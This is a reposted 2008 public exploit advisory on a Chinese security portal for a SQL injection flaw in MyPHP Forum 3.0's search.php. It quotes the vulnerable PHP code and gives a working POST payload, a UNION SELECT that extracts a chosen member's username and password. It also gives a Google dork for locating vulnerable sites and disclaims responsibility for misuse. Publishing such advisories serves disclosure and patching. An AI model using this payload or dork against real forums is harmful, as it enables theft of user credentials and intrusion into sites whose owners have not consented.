首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MyPHP Forum <= 3.0 (Final) Remote SQL Injection Vulnerability 来源：www.vfocus.net 作者：Paradox 发布时间：2008-01-04   #=================================================================================================# #                     ____            __________         __             ____  __                  # #                    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_                # #                     |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\               # #                     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |                 # #                     |___|___|  /\__|  /______  /\___  >__|            |___||__|                 # #                              \/\______|      \/     \/                                          # #=================================================================================================# #                                    This is a Public Exploit.                                    # #    Date: 03/01/2008 [dd,mm,yyyy]                                  # #                                                                                                 # #                                      !!!Happy New Year!!!                                       # #                                                                                                 # #=================================================================================================# #   MyPHP Forum v3.0 (Final) And Maybe Lower Multiple Sql Injection Vulnerabilities (Mq=Off/On)   # #                                                                                                 # #                                       Vendor:   www.myphp.ws                                    # #                                     Severity:   Highest                                         # #                                       Author:   The:Paradox                                     # #                                                                                                 # #=================================================================================================#                                                                                                 #                                       Proud To Be Italian.                                      # #=================================================================================================# """                                                                                                                                            Related Codes:                                          search.php; line 14: if($_POST['submit']) { $searchtext = $_POST['searchtext']; $searchuser = $_POST['searchuser']; if(!strstr($searchtext, '"')) { $keywords = explode(" ", $searchtext); for($i = 0; $i < count($keywords); $i++) { if($sqladdon != "") { $sqladdon .= " AND p.message LIKE '%$keywords[$i]%'"; } else { $sqladdon .= "p.message LIKE '%$keywords[$i]%'"; } } } else { $phrase = trim(stripslashes(strstr($searchtext, '"'))); $quotesarr = explode('"', $phrase); $quotes = count($quotesarr); $phrasecount = $quotes - (count(explode('" "', $phrase)) + 1); for($i = 0; $i < $quotes; $i++) { if($i != 0 && $i != $quotes - 1) { if($phraseoff != "yes") { $phraselist .= "$quotesarr[$i]|"; $phraseoff = "yes"; } else { $phraseoff = "no"; } } } $phrasearr = explode("|", $phraselist); $phrases = count($phrasearr) - 1; for($i = 0; $i < $phrases; $i++) { if($sqladdon != "") { $sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'"; } else { $sqladdon .= "p.message LIKE '%$phrasearr[$i]%'"; } } $newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext))); if($newsearchtxt != "") { $keywords = explode(" ", $newsearchtxt); } for($i = 0; $i < count($keywords); $i++) { if($sqladdon != "") { $sqladdon .= " AND p.message LIKE '%$keywords[$i]%'"; } else { $sqladdon .= "p.message LIKE '%$keywords[$i]%'"; } } } if($searchuser != "") { if($sqladdon != "") { $sqladdon .= " AND p.author LIKE '%$searchuser%'"; } else { $sqladdon .= "p.author LIKE '%$searchuser%'"; } } if($sqladdon != "" ) { search_header(); $ttnum = 1; // Now the Vulnerable Query =) $query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error()); """ #=================================================================================================# # Proof Of Concept / Bug Explanation:                                                             # #                                                                                                 # # A lot of Sql injection Vulnerabilities were found in this platform, but most of them work only  # # with the server configuration Magic Quotes Off.                                                 # # Whatever in Search.php there is a $searchtext is not propelly checked before the mysql_query.   # # The page does stripslashes to $searchtext var making us able to do an Sql injection with the    # # configuration of Magic Quotes On.                                                               # #                                                                                                 # #=================================================================================================# # Post Query :                                                                                    #                                                                                                 # submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*" #                                                                                                 # Attenction: the last " is needed (see code).                                                    #                                                                                                 #=================================================================================================# # Other injection vulnerabilities were found, but them were not pulished.                         # #=================================================================================================# # Google Dork=> Powered by MyPHP Forum v3.0                                                       # #=================================================================================================# # Use this at your own risk. You are responsible for your own deeds.                              # #=================================================================================================#   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·DivX Player 6.6.0 ActiveX SetP ·Site@School <= 2.3.10 Remote B ·WebPortal CMS <= 0.6.0 (index. ·DCP-Portal <= 6.11 Remote SQL ·Vantage Linguistics AnswerWork ·Half-Life CSTRIKE Server 1.6 D ·oneSCHOOL (all versions) admin ·FlexBB <= 0.6.3 Cookies Remote ·Zenphoto 1.1.3 (rss.php albumn ·Eggblog <= 3.1.0 Cookies Remot ·IBM Domino Web Access Upload M ·ClamAV 0.91.2 libclamav MEW PE   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved